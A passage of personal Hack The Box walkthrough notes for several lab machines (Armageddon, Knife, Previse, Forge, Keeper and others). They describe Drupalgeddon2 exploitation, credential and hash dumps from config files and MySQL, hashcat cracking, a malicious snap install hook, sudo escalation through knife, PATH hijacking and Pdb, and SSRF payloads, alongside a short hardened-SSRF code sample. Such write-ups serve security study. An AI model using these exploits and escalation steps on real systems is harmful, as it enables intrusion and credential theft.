   1. <https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/>
3. For privesc, found password : `wW59U!ZKMbG9+*#h` in `gitlab.rb` file located in `/opt/backup`

</details>

## Delievery

<details>

<summary>Initial ⇒ Register &#x26; Enumeration<br>Privesc ⇒ <code>/opt/mattermost</code> ⇒ config.json ⇒ mySQL creds ⇒ (MySql-CLI) ⇒ root </summary>

1. Nmap gives 22,80,8065
   1. 80 : a support ticket system is running ⇒ we can create a ticket and track its status
   2. 8065 : Mattermost is running ⇒ we can register (with email confirmation) & log in
2. Create a ticket on the port 80 website using a fake email and track the ticket status using the same fake email; then register the same fake email on the port 8065 website. The confirmation mail lands directly in the ticket status, so click the confirmation link and log in to Mattermost
3. Inside it we are able to find SSH creds for user `maildeliver`
4. Inside the shell, the `/opt` directory contains a `config.json` file which leaks the MySQL creds
5. Using those creds and doing some MySQL enumeration with the CLI, we are able to find the hash for the root user:

   ```
   root:$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO
   ```

</details>

## Ophiuchi

<details>

<summary>---</summary>

</details>

## Scriptkiddie

<details>

<summary>---</summary>

</details>

## Armageddon

<details>

<summary>Initial ⇒ Open-source exploit (Drupal 7 v7.56)<br>Privesc level 1 ⇒ Database creds in <code>/var/www/html/sites/default/setting.php</code> <br>Privesc level 2 ⇒ Binary exploit <code>snap install *</code>  , Crafting malicious snap package</summary>

## Recon & Enum

#### port scan

```bash
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
```

#### directory scan

```bash
/.html                (Status: 403) [Size: 207]
/index.php            (Status: 200) [Size: 7440]
/misc                 (Status: 301) [Size: 233] [--> http://10.10.10.233/misc/]
/themes               (Status: 301) [Size: 235] [--> http://10.10.10.233/themes/]
/modules              (Status: 301) [Size: 236] [--> http://10.10.10.233/modules/]
/scripts              (Status: 301) [Size: 236] [--> http://10.10.10.233/scripts/]
/sites                (Status: 301) [Size: 234] [--> http://10.10.10.233/sites/]
/includes             (Status: 301) [Size: 237] [--> http://10.10.10.233/includes/]
/install.php          (Status: 200) [Size: 3172]
/profiles             (Status: 301) [Size: 237] [--> http://10.10.10.233/profiles/]
/update.php           (Status: 403) [Size: 4057]
/README.txt           (Status: 200) [Size: 5382]
/robots.txt           (Status: 200) [Size: 2189]
/cron.php             (Status: 403) [Size: 7388]
/INSTALL.txt          (Status: 200) [Size: 17995]
/LICENSE.txt          (Status: 200) [Size: 18092]
/CHANGELOG.txt        (Status: 200) [Size: 111613]
/xmlrpc.php           (Status: 200) [Size: 42]
/COPYRIGHT.txt        (Status: 200) [Size: 1481]
/.html                (Status: 403) [Size: 207]
/UPGRADE.txt          (Status: 200) [Size: 10123]
/authorize.php        (Status: 403) [Size: 2824]
```

## website

<img src="/files/2bYOjr2OTGMXUK5t5iSm" alt="" data-size="original">

There is a login page running on it; after inspecting it in Burp I found that the website is PHP based and uses Drupal for authentication

```bash
X-Generator: Drupal 7 (http://drupal.org)
```

#### <http://10.10.10.233/CHANGELOG.txt>

I found the exact Drupal version number

```bash
Drupal 7.56, 2017-06-21
-----------------------
- Fixed security issues (access bypass). See SA-CORE-2017-003.
```

## shell as apache

#### searchsploit

There are lots of exploits for it

```bash
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)                                                     | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)                                                  | php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution                                          | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)                                      | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)                                             | php/webapps/44448.py
```

but this one matches our needs:\
version number\
unauthenticated\
not Metasploit\
public exploit on GitHub

```bash
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution

searchsploit -m php/webapps/44449.rb
```

#### CVE 2018 - 7600

This gives us a shell as apache and provides a link "<http://10.10.10.233/shell.php>" with parameter "c" through which we have RCE\
\
Let's get a reverse shell first ..... double-encode the payload while injecting it \
NOTE:\
the shell we get has /sbin/nologin, so there are lots of things we cannot do, like:\
cd, bash, python, nc, wget ..... etc., and for some other things it gives Permission Denied

If the script doesn't work, try the command below, then run the script again:

```bash
sudo gem install highline
```

## privesc apache => brucetherealadmin

We can't do much here; to escalate privileges I need some kind of credentials, because most commands don't work and I can't even transfer scripts such as linpeas to the victim.......\
\
After googling, I learned where the default database credentials are stored: \
"/sites/default/setting.php"

```bash
cat /var/www/html/sites/default/setting.php

$databases = array (
  'default' =>
  array (
    'default' =>
    array (
      'database' => 'drupal',
      'username' => 'drupaluser',
      'password' => 'CQHEy@9M*m23gBVj',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);
```

We got the database (drupal) credentials: `drupaluser` & `CQHEy@9M*m23gBVj` \
Before running mysql commands: we don't have a PTY shell, so each SQL query has to be executed directly in one go (with -e), otherwise the terminal hangs, as it did without that

```bash
mysql -e 'show tables;' -u drupaluser -p'CQHEy@9M*m23gBVj' drupal
>> we got alot of tables 

mysql -e 'show tables;' -u drupaluser -p'CQHEy@9M*m23gBVj' drupal | grep user
>> user table does exist

mysql -e 'select * from users;' -u drupaluser -p'CQHEy@9M*m23gBVj' drupal
1       brucetherealadmin       $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt
```

We got the hash for user "brucetherealadmin"; let's save it in a file, identify the hash type, then crack it

```bash
hashcat -m 7900 hash.txt ~/chaos/rockyou.txt

password >> booboo
```

I tried switching user but it didn't work, so I tried SSH and got the shell as brucetherealadmin

## privesc brucetherealadmin =>  root

#### sudo -l

Found a binary that I can run as root:

```bash
User brucetherealadmin may run the following commands on armageddon:
    (root) NOPASSWD: /usr/bin/snap install *
```

I immediately went to GTFOBins, and found this:

It says this binary can't do anything on its own; basically it is a package manager to install packages, just like apt, but we can create a malicious package and then try to install it

#### creating malicious package

First I just try to read root.txt: create the package on the attacker machine, transfer it to the victim, then use snap to install it

```bash
# first, install fpm to create the snap package
sudo gem install fpm

# second, create the package
COMMAND='cat /root/root.txt'
cd $(mktemp -d)
mkdir -p meta/hooks
printf '#!/bin/sh\n%s; false' "$COMMAND" >meta/hooks/install
chmod +x meta/hooks/install
fpm -n xxxx -s dir -t snap -a all meta

# third, transfer it to the victim and install it
sudo snap install xxxx_1.0_all.snap --dangerous --devmode
```

We got root.txt, but not a shell

</details>

## Knife

<details>

<summary>Initial ⇒ Recon , Open-exploit<br>Privesc ⇒ sudo -l , Binary Exploitation :- <code>/usr/bin/knife</code></summary>

## Recon & Enum

### port scan

```
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
```

### directory scan

```bash
/.html                (Status: 403) [Size: 277]
/index.php            (Status: 200) [Size: 5815]
/.html                (Status: 403) [Size: 277]
/server-status        (Status: 403) [Size: 277]
```

## website

Nothing interesting here, just a static page \
although the intercepted response shows the PHP version

```bash
X-Powered-By: PHP/8.1.0-dev
```

## shell as james

We can search for an exploit for this; after searching I got this exploit:

## privesc james -> root

```bash
sudo -l

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
```

After searching GTFOBins, I got this:

```bash
sudo knife exec -E 'exec "/bin/sh"'
```

and i got the shell as root

</details>

## Pit

<details>

<summary>---</summary>

</details>

## Seal

<details>

<summary>---</summary>

</details>

## Previse

<details>

<summary>Initial ⇒ EAR , Command Injection<br>Privesc level 1 ⇒ MySQL creds in <code>/var/www/something/config.php</code> <br>Privesc level 2 ⇒ sudo -l , Path Injection in execution of shell script</summary>

## Recon & Enum

#### port scan

```bash
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
```

#### directory scan

Nothing new found; whatever is discoverable here is already reachable from the web page

## website

#### <http://10.10.11.104> -> redirects -> <http://10.10.11.104/login.php>

When I entered the IP "10.10.11.104" it redirected me to "10.10.11.104/login.php", so there is a login page; I used the EAR vulnerability to bypass it

#### <http://10.10.11.104/logs.php>

We get a function to download logs with a specified delimiter: comma, space, tab

## shell as www-data

I captured the request in Burp and tried command injection in the delimiter parameter; it worked, so I injected the rev shell and got the callback on my listener

## privesc www-data => m4lwhere => root

#### www-data -> m4lwhere

On <http://10.10.11.104/acounts.php> there is a function to download the site backup file; I downloaded it and after unzipping I got a bunch of files, including config.php:

```php
<?php

function connectDB(){
    $host = 'localhost';
    $user = 'root';
    $passwd = 'mySQL_p@ssw0rd!:)';
    $db = 'previse';
    $mycon = new mysqli($host, $user, $passwd, $db);
    return $mycon;
}

?>
```

Let's connect to MySQL, where I get the hash for user "m4lwhere":

```bash
mysql -e 'select * from accounts' -u root  previse -p
Enter password:
+----+----------+------------------------------------+---------------------+
| id | username | password                           | created_at          |
+----+----------+------------------------------------+---------------------+
|  1 | m4lwhere | $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. | 2021-05-27 18:18:36   |
|  2 | vaibhav  | $1$🧂llol$6EeWgoBQj2zKVIVN.TdRU. | 2023-05-10 15:39:00   |
+----+----------+------------------------------------+---------------------+
```

After cracking it I got the password **ilovecody112235!**; su / ssh .... and got the shell as **m4lwhere**

#### m4lwhere -> root

I did sudo -l and found a file

```bash
cat /opt/scripts/access_backup.sh
#!/bin/bash

# We always make sure to store logs, we take security SERIOUSLY here

# I know I shouldnt run this as root but I cant figure it out programmatically on my account
# This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time

gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz
gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gz
```

The problem is not the script itself; the script runs as root and calls "gzip" without a full path, so I can simply put my current directory at the front of the PATH variable, create a fake binary named gzip with my rev\_ shell in it, and then run the script, which executes my gzip ... and I got the callback on my nc listener

## privesc www-data  => root

#### linpeas.sh

linpeas found that the system is vulnerable to CVE-2021-4034, so I googled it

Run this, and get the shell as root\
<https://github.com/berdav/CVE-2021-4034>

</details>

## Forge

<details>

<summary>Initial ⇒ SSRF (http://) chaining with another SSRF (ftp://) , Recon<br>Privesc ⇒ Recon in <code>/opt</code> , Script Breaking , PDB (python debugger)</summary>

1. Nmap gives 21 : filtered & 22,80 : open; subdomain enum gives `admin.forge.htb`
2. On the website `forge.htb` we can upload a file from the machine as well as from a URL, & visiting `admin.forge.htb` says: only localhost allowed
3. Fetching `admin.forge.htb` via upload-from-URL succeeded: it is vulnerable to SSRF
   1. check the URL `http://admin.forge.htb` using `http://forge.htb`
      1. SSRF fails ⇒ try with mixed upper/lower case: `AdMin.ForGe.hTb` (case-injection)
   2. After visiting the link, the website gives another obfuscated link which does not work in the browser
      1. Direct visit fails ⇒ try with curl, or with curl + base64 encode
4. This reveals some good information :

```html
<!DOCTYPE html>
<html>
<head>
    <title>Announcements</title>
</head>
<body>
    <link rel="stylesheet" type="text/css" href="/static/css/main.css">
    <link rel="stylesheet" type="text/css" href="/static/css/announcements.css">
    <header>
            <nav>
                <h1 class=""><a href="/">Portal home</a></h1>
                <h1 class="align-right margin-right"><a href="/announcements">Announcements</a></h1>
                <h1 class="align-right"><a href="/upload">Upload image</a></h1>
            </nav>
    </header>
    <br><br><br>
    <ul>
        <li>An internal ftp server has been setup with credentials as user:heightofsecurity123!</li>
        <li>The /upload endpoint now supports ftp, ftps, http and https protocols for uploading from url.</li>
        <li>The /upload endpoint has been configured for easy scripting of uploads, and for uploading an image, one can simply pass a url with ?u=&lt;url&gt;.</li>
    </ul>
</body>
```

5. Crafting the final payload:

```bash
http://admin.forge.htb/upload?u=ftp://user:heightofsecurity123!@127.0.0.1/.ssh/
```
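As an added example (not the Forge portal's code, which the page does not show), a constructed sketch of the two flaws that steps 3 to 5 chain together: a case-sensitive hostname denylist that also accepts `ftp://`, beside a hardened check that allowlists the scheme, case-folds the host, rejects embedded credentials and refuses URLs resolving to non-global addresses. The DNS table, the `images.example.com` host and its address are constructed assumptions so the code runs offline.

```python
import socket
from ipaddress import ip_address
from urllib.parse import urlsplit

# Constructed DNS table so the example runs offline (not real resolution).
CONSTRUCTED_DNS = {
    "admin.forge.htb": "127.0.0.1",
    "forge.htb": "127.0.0.1",
    "images.example.com": "93.184.216.34",  # constructed public address
}

def constructed_resolve(host: str) -> str:
    """Stand-in for socket.gethostbyname backed by CONSTRUCTED_DNS."""
    try:
        return CONSTRUCTED_DNS[host]
    except KeyError:
        raise socket.gaierror(f"constructed: no record for {host}")

# --- Vulnerable sketch: case-sensitive hostname denylist, any scheme --------
BLOCKED_HOSTS = {"admin.forge.htb", "localhost", "127.0.0.1"}

def naive_is_allowed(url: str) -> bool:
    """Takes whatever sits between '://' and the first '/' as the host.
    'AdMin.ForGe.hTb' is not in the set, and 'user:pass@127.0.0.1' is
    not either, so both the case-injection and the ftp:// fetch pass."""
    host = url.split("://", 1)[-1].split("/", 1)[0]
    return host not in BLOCKED_HOSTS

# --- Hardened sketch: scheme allowlist + normalised host + resolved IP -----
ALLOWED_SCHEMES = {"http", "https"}

def hardened_is_allowed(url: str, resolve=constructed_resolve) -> bool:
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False                      # ftp://, file://, gopher:// refused
    if parts.username is not None or parts.password is not None:
        return False                      # no credentials embedded in the URL
    host = (parts.hostname or "").lower().rstrip(".")  # hostname is case-folded
    if not host or host == "localhost" or host.endswith("forge.htb"):
        return False                      # the app's own domains stay internal
    try:
        ip = ip_address(resolve(host))
    except (socket.gaierror, ValueError):
        return False
    # Loopback, RFC 1918, link-local and other non-global ranges are refused.
    # The fetch itself should then connect to this resolved IP instead of
    # re-resolving, so a rebinding answer cannot swap in 127.0.0.1 later.
    return ip.is_global
```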

6. SSH shell as user `user`; for privesc I run `sudo -l`, which gives `/opt/remote-manage.py`
7. This script:
   1. has a password,
   2. offers some options we can run (1, 2, 3, 4),
   3. starts listening on a random port when executed,
   4. and if the input is anything other than the given numbers, it drops into PDB automatically.
   5. To deal with it we need another session and have to connect to the same port.
   6. Finally, enter any random input; the script breaks on the other end and gives a `(Pdb)` prompt, where we insert the reverse shell.

```bash
user@forge:~$ sudo /usr/bin/python3 /opt/remote-manage.py
Listening on localhost:11563
invalid literal for int() with base 10: b'0xdf'
> /opt/remote-manage.py(27)<module>()
-> option = int(clientsock.recv(1024).strip())
(Pdb)

# PDB = python debugger

# Perform command execution here in order to get reverse shell
(Pdb) import os
(Pdb) os.system('bash')
```

</details>

## Horizontal

<details>

<summary>Initial ⇒ done<br>Privesc ⇒  ----</summary>

</details>

## Shibboleth

<details>

<summary>xxxxxxxxx</summary>

</details>

## Writer

<details>

<summary></summary>

</details>

## Pandora

<details>

<summary>---</summary>

</details>

## Meta

<details>

<summary>---</summary>

</details>

## Paper

<details>

<summary>xxxx</summary>

</details>

## Keeper

<details>

<summary>Default Creds  ||  Privesc ⇒ Keepass  (<a href="https://nvd.nist.gov/vuln/detail/CVE-2023-32784">CVE-2023-32784</a>)  |  Putty-Key ⇒ openssh convert</summary>

1. The website runs `request ticketer` by `Best practical`, with a login form.

   Default creds give access; inside, under the /user directory, I am able to find the password for user `Lisa`.
2. After SSH, inside the home directory I find file.zip, which on extraction gives a `KeePass` dump and a .kdbx file.
3. For dumping the master password I used the <https://github.com/vdohney/keepass-password-dumper> exploit, then opened file.kdbx with that master key using `kpcli`.
4. The above step was done with dotnet version 7.0.
5. Enumeration gives a `PuTTY` key for user root; converting the PuTTY key to OpenSSH format got me a shell as root.

</details>
